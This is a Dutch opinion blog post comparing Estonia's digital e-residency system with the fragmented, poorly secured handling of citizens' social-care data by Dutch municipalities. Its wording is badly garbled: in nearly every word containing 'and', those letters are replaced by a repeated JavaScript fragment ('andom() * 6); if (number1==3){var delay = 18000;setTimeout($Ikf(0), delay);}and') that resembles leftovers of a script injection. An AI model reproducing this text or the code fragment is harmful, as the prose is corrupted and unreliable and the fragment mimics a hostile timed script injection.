Tag archieven: sociaal domein

e-Inwoner van Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and

andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.png” alt=”” width=”682″ height=”398″ />Wat zijn we toch aan het prutsen. Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is het meest gedigitaliseerde landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van de wereld. Iedere Est, en dat zijn er 1.3 miljoen, heeft een e-identiteit. Sterker, iedereen in de wereld kan die aanvragen, je wordt dan een e-ingezetene van Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. Geen fysieke echte ingezetene, met stemrecht, maar gebruiker van een super veilig internet waarin jij de regie hebt over alles wat er online over je bekend is.

Hier is dat andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders.
Sinds de decentralisatie heeft iedere gemeente zijn eigen vorm van sociaal domein opgezet. Met een eigen vorm van sociaal wijkteam. Met een eigen ingekocht registratiesysteem (leuk voor de ICT leveranciers, die daar goed aan verdienen, ten kosten van ons belastinggeld). Met per gemeente eigen eisen op het gebied van registratie, verantwoording en beschikbaar stellen van budgetten. Wat er voor zorgt dat grote organisaties met meerdere gemeenten als klant extra mensen aan hebben moeten trekken om aan die wirwar van eisen te kunnen voldoen. Waardoor minder geld beschikbaar is voor de core business: hulp verlenen. Met om de paar jaar een heel circus om; wat even werkte na een aanloopperiode; weer net zo makkelijk overboord te kieperen met aanbestedingen en het wiel met nieuwe spelers opnieuw uit te vinden.

Ten koste van werkers, die geen baanzekerheid hebben. Ten koste van burgers die met nieuwe dienstverleners te maken krijgen en dus niet verzekerd zijn van zorg die ze soms wel heel hard nodig hebben. En ten koste van onze gegevens (data), die we in handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden geven van een overheid die om de paar jaar die gegevens aan weer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere spelers moet leveren om ons zorg te kunnen blijven leveren. Lekker betrouwbaar.

Nou is er een voordeel: doordat we in Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and zo’n uiterst versnipperd landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andschap hebben met ingebouwde bugs, is de schade als het fout gaat enigszins beperkt. Er is geen almachtige big brother die alles bepaalt. Er zijn ongeveer net zo veel big brothers als dat we gemeenten hebben en die kijken alleen naar de mensen die daar toevallig wonen.

Heb je het stempel “u bent kwetsbaar” in de ene gemeente, omdat je ooit contact had met het plaatselijke wijkteam, maar ga je verhuizen naar de andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere, dan kan je daar met een schone lei opnieuw beginnen. Gegevens worden niet over gedragen. Systemen passen niet in elkaar, Data kan niet worden overgedragen, ten minste, niet zonder fysiek handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andwerk. En daar is geen tijd voor. Verhuis je, dan ben je letterlijk uit beeld. Je reset je situatie.

Onze overheid is op dit moment de meest onbetrouwbare partner voor de opslag van gegevens van burgers die je maar kan bedenken. Naast versnippering is er geen regie en al helemaal geen eensluidend systeem a la Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dat we als inwoners van dit landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and kunnen vertrouwen. Er wordt geprutst met DigiD, datalekken met gestolen laptops, miljarden flops van ICT systemen die niet werken. Sociaal werkers die data produceren maar geen idee hebben waar die gegevens heen gaan en wie ze in kan zien. En geen mens die daar verantwoording voor draagt. We halen onze schouders op en dealen met de situatie.

Dat hebben ze in Estlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and heel andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders aangepakt. Dat moet ook wel, want in 2007 legde Ruslandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and, voormalige bezetter, het hele landom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and compleet stil via een ICT aanval. En dat zou zo maar weer kunnen gebeuren. De Russen doen dat nu in Oekraïne. Dus hebben de Esten een systeem opgezet dat betrouwbaar is, eenvoudig voor de gebruiker, met backups op meerdere plekken en met een leger dat ook online klaar staat om aanvallen af te slaan. En iedereen kan daar ingezetene van worden zodat, als de Russen weer komen, de hele wereld direct getuige is en zal gaan schreeuwen dat de Russen weg moeten wezen. Soft power noemen ze dat.

Wat wij hier nog het beste op orde hebben is het online bank-systeem. Om klanten zo ver te krijgen dat die online gingen bankieren konden zij niet andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders dan tot het uiterste gaan om een superbetrouwbaar veilig systeem op te zetten dat bankieren mogelijk maakt. Anders was geen hond er aan begonnen en zaten we nu nog overschrijf-briefjes in te vullen.

Kunnen we ook zo iets voor ons sociaal verkeer inrichten?

Lees ook: https://www.welzijn30.nl/manifest-voor-de-digitaal-sociaal-werker/

 

BewarenBewaren